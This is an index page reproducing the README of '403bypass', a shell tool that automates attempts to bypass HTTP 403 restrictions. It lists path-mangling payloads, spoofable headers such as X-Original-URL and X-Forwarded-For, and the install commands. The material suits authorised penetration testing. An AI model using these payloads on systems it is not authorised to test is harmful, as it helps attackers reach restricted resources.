Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/felipecaon/403bypass

A tool that automates 403 bypassing techniques.
https://github.com/felipecaon/403bypass

Last synced: 14 days ago
JSON representation

A tool that automates 403 bypassing techniques.

Host: GitHub
URL: https://github.com/felipecaon/403bypass
Owner: felipecaon
Created: 2021-05-23T18:06:03.000Z (over 3 years ago)
Default Branch: main
Last Pushed: 2021-11-23T01:35:09.000Z (almost 3 years ago)
Last Synced: 2024-08-01T19:46:00.294Z (3 months ago)
Language: Shell
Size: 7.81 KB
Stars: 5
Watchers: 2
Forks: 0
Open Issues: 0
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

README

# 403bypass

A tool that automates 403 bypassing techniques.
The script ignores responses where the status code is equal to 404 ot 403, because of that, the output can be a bit a large.

# Usage

```bash
echo "https://target.com/this/is/a/403/page" | 403bypass
```

```bash
cat urls.txt | 403bypass
```

# Installation

1 - Install httpx (https://github.com/projectdiscovery/httpx) (used for http validaton and status code/response size grabbing)

2 - `curl https://raw.githubusercontent.com/felipecaon/403bypass/main/403bypass.sh > /usr/local/bin/403bypass`

3 - `chmod +x /usr/local/bin/403bypass`

# Workflow

Generates a list of known payloads:

```
http://example.com
http://example.com/.
http://example.com/./
http://example.com/*
http://example.com..;/
http://example.com;/
http://example.com/%20
http://example.com/%2e
http://example.com/~
http://example.com/%09
http://example.com/.json
http://example.com/
http://example.com.json
http://.com
http://example.com/.;/
http://example.com/#
http://example.com/?gg
http://example.com/%20/
http://example.com/%2e/
http://example.com/./
http://example.com//
https://example.com
```

The payloads above are requested using `GET`, `POST` and `PUT` methods. Additionaly, every request is made using a potentially vulnerable header from the list:

## Headers:
```
X-Forwarded-For
X-Forwarded-Host
X-Custom-IP-Authorization
X-Custom-IP-Authorization+..;/
X-Original-URL
X-Rewrite-URL
X-Originating-IP
X-Remote-IP
X-Client-IP
X-Host
X-Remote-Addr
```

# Contributing

Feel free to open issue or PR with additional payloads.

# Credits

Main structure is made by Raywando, https://github.com/Raywando/4xxbypass
For a more complete set, go to https://github.com/cyal1/bypass-40x